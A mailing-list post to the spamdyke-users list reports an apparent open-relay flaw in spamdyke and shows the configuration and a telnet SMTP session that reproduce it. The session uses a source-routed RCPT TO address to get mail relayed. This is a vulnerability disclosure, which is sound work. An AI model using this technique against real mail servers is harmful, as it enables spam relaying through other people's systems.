Hi folks, After a recent scan of our servers (having only just deployed spamdyke), we've discovered what we believe is a security issue with spamdyke which will allow open relaying.
It looks like the issue has to do with multiple recipients being specified in the RCPT TO line, and the first recipient being just a valid host in the rcpthosts. The end result is that mail will be sent through to whatever other addresses are specified. Setup is as follows: ~$ cat /var/qmail/control/rcpthosts example.com ~$ cat /etc/spamdyke/spamdyke.conf local-domains-file=/var/qmail/control/rcpthosts relay-level=normal smtp-auth-level=observe ~$ telnet localhost smtp Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 localhost ESMTP MAIL FROM: [email protected] 250 ok RCPT TO: <@example.com:[email protected]> 250 ok DATA 354 go ahead Subject: Test Test body . 250 ok 1278906723 qp 27089 Regards, Chris Boulton Lead Engineer BigCommerce / Interspire Email: [email protected] Web: http://www.bigcommerce.com Web: http://www.interspire.com Australia: +61 2 9262 7770 USA: 1800 939 5570 _______________________________________________ spamdyke-users mailing list [email protected] http://www.spamdyke.org/mailman/listinfo/spamdyke-users
